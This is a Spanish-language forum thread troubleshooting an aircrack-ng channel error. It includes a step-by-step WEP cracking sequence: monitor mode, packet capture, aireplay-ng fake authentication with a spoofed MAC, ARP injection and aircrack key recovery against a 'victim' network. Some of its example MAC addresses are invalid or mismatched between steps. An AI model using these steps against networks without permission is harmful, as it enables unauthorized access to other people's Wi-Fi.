Hola chicos.

He seguido distintos manuales de aircrack, y siguiendo los pasos me da un error.

Estos son los pasos que hago:
-subo la interfaz, modo monitor...etc
-airodump para ver las redes. Esperar a que se asocie.
-aireplay, aqui me da el error.

Por ej, quiero crackear el wifi mio. Está en el canal 6, y anteriormente puse wlan0 en modo monitor: airmon-ng start wlan0 -c 6.

Hasta ahí todo bien. Llega la parte de aireplay, y me dice: mon0 is running on channel -1, the AP is on channel 6. o algo similar.

Alguien sabe algo de esto?

Saludos.

Apaga el NetworkManager.

Si no se arregla, posteanos de principio a fin como mandas las ordenes a los programas.

Buena idea, fruit. Probaré.

Sigue sin funcionar. Finalizo el proceso del NetworkManager pero aún así me salta el error. Any idea?

airmon-ng start wlan0 con esto te vale.

1- que tipo de clave quieres descifrar wep o wpa.

2- Esto lo hicistes alguna vez ?¿?, si no lo has hecho nunca es muy normal que hayas asimilado alguno de los conceptos mal, y tengas algun error de sintaxis, si es ese el caso por favor posteanos todos los pasos que siges, porque si no va a ser imposible que te ayudemos.

Al principio pongo airmon-ng start wlan0, luego airodump y a escanear. Cuando me asocie, en otra terminal aireplay con su sintaxis...etc, bssid victima, mac mia, mon0. Al ejecutar aireplay-ng es cuando me salta el error. mon0 is running in channel -1, the ap is on channel 6, o algo asi.

iwconfig wlan0 channel 6

1-airmon-ng start wlan0

2-airodump-ng -c(canal a escuxar) 6 --bssid(nombre de la red) 00:80:5A:5A:79:9F(mac de la red) -w(guardas lo paquetes que capturas) cojiendo wlan0

3- Vamos con la falsa autentificacion para poder inyectar paquetes (NO Cierres la ventana de airodump-ng);

aireplay-ng -1(flag) 0 (0 para falsa autentificacion) –e (nombre red) Red-hack -a ( mac de la red hack) 22:33:55:66:88:t3 -h (Tu mac que no tiene por que ser la verdadera puedes poner una ficticia) 11:22:33:44:55:21 wlan0(nombre de tu adaptador)


4- vamos a inyectar

aireplay-ng -3(flag para inyecion) -b(mac red hack) 00:45:66:34:12:09 -h (mac que antes inventastes para tu adaptador) 22:33:55:66:88:t3 wlan0(hace falta que lo diga xd)

5- cuado creas que tengas vastantes paquetes capturados;

aircrack -z(flag modo rapido de crackeo) ruta\*.cap o cojiendo.cap

No lo habia pensado de esa forma, el airodump lo ponía de forma extensa: airodump-ng mon0 (wlan0 en monitor)... Probaré lo de fruit y lo tuyo

Fruit, no puedo matar el NetworkManager, ni por el monitor de sistema ni por la terminal. Lo mato, pero se vuelve a abrir. ¿Alguna idea?

En parte lo he solucionado, pero usando wifiway o backtrack. Pero no se como usarlo en ubuntu, junto a otros programas instalados y eso.

/etc/init.d/networkmanager stop

(O como se llame, cada distro le pone un nombre distinto, a lo mejor es nm, network-manager, NetworkManager...)

mas facil aun,
en lugar de poner en monitor el canal 6 con el airmon, hazlo con el airodump, pon:

airmon-ng start wlan0
airodump-ng -w f.cap --channel 6 wlan0
si le especificas el canal con el airodump no te dara problemas seguro
sino con el iwconfig tambien te deberia funcionar, aunque es mas practico asi